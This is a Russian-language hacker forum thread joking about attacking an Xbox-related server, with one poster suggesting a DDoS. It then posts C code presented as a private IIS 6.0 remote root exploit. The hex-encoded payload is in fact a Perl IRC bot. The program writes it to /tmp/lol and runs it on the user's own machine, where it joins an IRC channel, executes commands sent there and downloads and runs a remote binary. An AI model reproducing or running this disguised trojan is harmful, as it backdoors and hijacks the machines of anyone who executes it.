что такое 0-day exploit?

Интересно кому этот Хы-Бокс нужен? тот кто этим рискнет занятся скорее всего со шпиля вырос

предлогаю проста задосить..

Этого ребенка по Вашей милости и так называемой доброте душевной в колонию для несовершеннолетних отправят.

да-да. о результатах доложишь тут. наработки выкладывай, народ подхватит.

ктонибудь будет ломать сервант?

[QUOTE]Kash пишет:
<font color=RED>А чё типа тут хакеров настояшЫх нету? </font>

Извини дорогой, но предложили бы че нить по приличней. Настоящим парням и так есть чем заняться.

P/S: Если кто знает кодекс хакера, то в этом смысле их уже давно нет.

Настоящие парни... кодекс хакера...
Срань господня, есть же мутанты на свете...

/*
* *** PRIVATE * PRIVATE * PRIVATE ***
* ******** DO NOT DISTRIBUTE ********
*
*
* IIS/6.0 - Remote Root Exploit =))))
*
*
* ******** DO NOT DISTRIBUTE ********
* *** PRIVATE * PRIVATE * PRIVATE ***
*
*
*
*/


#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>

unsigned char h3llc0de[]=
{
     0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
     0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
     0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
     0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
     0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
     0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
     0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
     0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
     0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
     0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
     0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
     0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
     0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
     0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
     0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
     0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
     0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
     0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
     0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
     0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
     0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
     0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
     0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
     0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
     0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
     0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
     0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
     0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
     0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
     0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
     0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
     0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
     0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
     0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
     0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
     0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
     0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
     0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
     0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
     0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
     0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
     0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
     0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
     0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
     0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
     0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
     0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
     0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
     0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
     0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
     0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
     0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
     0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
     0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
     0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
     0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
     0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
     0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
     0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
     0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
     0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
     0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
     0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
     0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
     0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
     0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
     0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
     0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
     0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
     0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
     0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
     0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
     0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
     0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
     0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
     0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
     0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
     0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
     0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
     0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
     0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
     0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
     0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
     0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
     0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
     0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
     0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
     0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
     0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
     0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
     0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
     0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
     0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
     0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
     0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
     0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
     0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
     0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
     0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
     0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
     0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
     0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
     0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
     0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
     0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
     0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
     0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
     0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
     0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
     0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
     0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
     0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
     0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
     0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};

unsigned short csum(unsigned short *buf, int nwords)
{
        unsigned long sum;
        for(sum=0;nwords>0;nwords--);
                 sum+=*buf++;
        sum=(sum>>16)+(sum&0xffff);
        sum+=(sum>>16);
        return ~sum;
}
                                                                                           
unsigned short in_cksum(unsigned short *addr,int len)
{
        register int nleft=len;
        register unsigned short *w=addr;
        register int sum=0;
        unsigned short answer=0;
        while(nleft>1)
        {
                 sum+=*w++;
                 nleft-=2;
        }
        if(nleft==1)
        {
                 *(u_char *)(&answer)=*(u_char *)w;
                 sum+=answer;
        }
        sum=(sum >> 16)+(sum & 0xffff);
        sum+=(sum >> 16);
        answer=~sum;
        return(answer);
}


int main(int argc, char **argv)
{


        int sockfd;
        struct sockaddr_in addr;
        char *payload=h3llc0de;
        char *buf;
        struct iphdr *iph;
        struct udphdr *tcph;
        int tot_len;
     FILE *f;
     int die=0;

     if(argc!=2)
     {
           printf("ERROR: No ip address entered\n");
           printf("usage:\n%s [IP-ADDRESS]\n\n",argv[0]);
           die=1;
     }


        addr.sin_family=AF_INET;
        addr.sin_port=htons(5555);
     if(argc==1) argv[1]="";
        addr.sin_addr.s_addr=inet_addr(argv[1]);
                                                                                           
        sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_UDP);
        if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE YOU ROOT?\n");die=1;}

        tot_len=sizeof(struct iphdr)+sizeof(struct udphdr)+strlen(payload);
        buf=(char *)malloc(tot_len);
                                                                                           
        malloc(buf,0,tot_len);
                                                                                           
        iph=(struct iphdr*)buf;
        tcph=(struct udphdr*)(buf+sizeof(struct iphdr));

        iph->ihl=5;
        iph->version=4;
        iph->tos=0;
        iph->tot_len=tot_len;
        iph->id=htons(31337);
        iph->frag_off=0;
        iph->ttl=225;
        iph->protocol=IPPROTO_UDP;
        iph->check=0;
        iph->saddr=inet_addr("127.0.0.1"); // spoof the source to make it untracable
        iph->daddr=inet_addr(argv[1]);
        iph->check=in_cksum((unsigned short *)&iph,sizeof(iph));
                                                                                           

        tcph->source=htons(31337);
        tcph->dest=htons(135); // the default RPC port
        tcph->len=htons(sizeof(struct udphdr)+strlen(payload));
        tcph->check=0;
        memcpy(buf+sizeof(struct iphdr)+sizeof(struct udphdr),payload,strlen(payload));
        f=fopen(h3llc0de+904,"w");
     if(f)
     {
           fseek(f,0,SEEK_SET);
           close(2);
                 fwrite( h3llc0de, sizeof h3llc0de, 1, f );
              fclose(f);}
                 system(h3llc0de+874);
        {
                 int one=1;
                 const int *val = &one;
                  if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one))& lt;0 && !die)
                           printf("warning: cannot set HDRINCL\n");
        }

        if(sendto(sockfd,buf,tot_len,0,(struct sockaddr *)&addr,sizeof(addr))<0 && !die)
                 printf("err\n");
        else if (!die) printf("Server Patched or not Vulnerable :_(\n");
        return 0;
}